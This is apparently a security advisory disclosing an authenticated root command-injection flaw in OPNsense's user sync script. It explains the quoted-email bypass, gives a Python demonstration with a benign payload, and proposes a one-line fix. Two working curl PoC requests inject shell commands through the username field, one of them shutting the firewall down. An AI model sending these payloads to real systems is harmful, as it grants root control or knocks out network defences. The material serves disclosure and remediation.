Summary
An authenticated Remote Code Execution (RCE) vulnerability in the OPNsense core allows a user with user-management privileges to execute arbitrary system commands as root. An attacker can bypass input validation by formatting their malicious payload as a compliant email address, allowing shell commands to reach the underlying operating system.
Details
The flaw exists in the local user synchronization flow, within core/src/opnsense/scripts/auth/sync_user.php.
When a user is added or modified, the script signals the backend that a user change has occurred by invoking pluginctl. However, the $username variable is passed directly into the shell command string.
While both the web interface and API enforce validation on the username field, the application explicitly allows valid email addresses to be used as usernames. The "local-part" of an email address can be wrapped in quotes. Inside these quotes, shell metacharacters are considered legally valid email characters.
By supplying a crafted email address, the payload passes the email validation checks but retains the shell payload. When passed blindly to the shell by mwexecf, the shell interprets the metacharacters, leading to arbitrary command execution.
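The mechanism described above, as an added example in Python (not OPNsense's PHP code): a simplified e-mail validator constructed for this example stands in for the application's check, `printf` stands in for `pluginctl`, string concatenation models the `' . $username` pattern, and `shlex.quote` models the per-argument escaping that the `%s`/array form of `mwexecf` is assumed to apply. The backtick payload used here is benign (`echo INJECTED`) but has the same shape as the advisory's PoC.

```python
# Added example, not OPNsense code: shows why a syntactically valid e-mail
# address can still carry shell metacharacters, and why building the command
# with per-argument quoting (the %s/args form of the fix) stops them.
import re
import shlex
import subprocess

# Simplified e-mail validator, constructed for this example. It accepts either a
# conservative dot-atom local-part or an RFC 5321 quoted string, in which nearly
# every printable character (including ` $ | ; & < >) is legal.
_DOT_ATOM = r"[A-Za-z0-9._%+-]+"
_QUOTED = r'"(?:[ !#-\[\]-~]|\\[ -~])*"'
_DOMAIN = r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?\.)+[A-Za-z]{2,}"
EMAIL_RE = re.compile(rf"^(?:{_DOT_ATOM}|{_QUOTED})@{_DOMAIN}$")


def is_valid_email(username: str) -> bool:
    """Return True if the username is a syntactically valid e-mail address."""
    return EMAIL_RE.fullmatch(username) is not None


# Characters the shell gives special meaning to when a string is interpolated
# unquoted into a command line.
SHELL_META = set("`$|;&<>()\n")


def shell_metacharacters(username: str) -> set:
    """Shell metacharacters present in the username (a review/detection check)."""
    return SHELL_META & set(username)


# Stand-in for '/usr/local/sbin/pluginctl -c user_changed': printf just echoes
# the argument it receives, so the output shows what the real tool would get.
COMMAND = "printf '%s\\n'"


def vulnerable_command(username: str) -> str:
    """String concatenation, the PHP '... ' . $username pattern: no quoting at all."""
    return COMMAND + " " + username


def hardened_command(username: str) -> str:
    """Per-argument quoting, the behaviour the %s/array form is assumed to provide."""
    return COMMAND + " " + shlex.quote(username)


def run(command: str) -> str:
    """Execute a command line through /bin/sh and return its stdout, trimmed."""
    result = subprocess.run(["sh", "-c", command], capture_output=True, text=True, timeout=5)
    return result.stdout.strip()


if __name__ == "__main__":
    # Constructed, benign payload in the same shape as the advisory's PoC:
    # a quoted local-part carrying a backtick command substitution.
    for name in ["alice@example.com", '"`echo INJECTED`"@example.com']:
        print(f"username           : {name}")
        print(f"  passes validation: {is_valid_email(name)}")
        print(f"  shell metachars  : {sorted(shell_metacharacters(name))}")
        print(f"  concatenated     : {run(vulnerable_command(name))}")
        print(f"  quoted argument  : {run(hardened_command(name))}")
```

Running the script shows the concatenated form handing `INJECTED@example.com` to the stand-in tool (the substitution ran), while the quoted form hands over the literal address. `shell_metacharacters` is the kind of check a reviewer can run over an existing user database to find accounts that would have triggered the flaw before the fix was deployed.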
PoC - Examples
curl -k -u <api key> \
-H 'Content-Type: application/json' \
-X POST http://<IP>/api/auth/user/add/ \
-d '{"user": {"name": "\"`id>/conf/proof.txt`\"@example.com", "password": "TestPass123", "scrambled_password": "0"}}'
Result: uid=0(root) gid=0(wheel) groups=0(wheel)
curl -k -u <api key> \
-H 'Content-Type: application/json' \
-X POST http://<IP>/api/auth/user/add/ \
-d '{"user": {"name": "\"`/sbin/shutdown${IFS}-p${IFS}now`\"@example.com", "password": "TestPass123", "scrambled_password": "0"}}'
Impact
Successful exploitation yields total system compromise. Because the injected commands execute as root, an attacker can completely take over the firewall.
Recommended Fix
In sync_user.php:
- mwexecf('/usr/local/sbin/pluginctl -c user_changed ' . $username);
+ mwexecf('/usr/local/sbin/pluginctl -c user_changed %s', [$username]);
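Review bot: the `%s`/array form is only a fix if mwexecf runs each element of the array through escapeshellarg (or equivalent) before substituting it into the format string; please confirm that in the helper's definition as part of this change, and add a short comment at the call site noting that $username is untrusted input so nobody reverts to concatenation. Since the advisory states the username is accepted from both the web interface and the API, it is also worth checking the same script for any other `' . $username` concatenation into mwexecf or mwexec, which this two-line change would not cover.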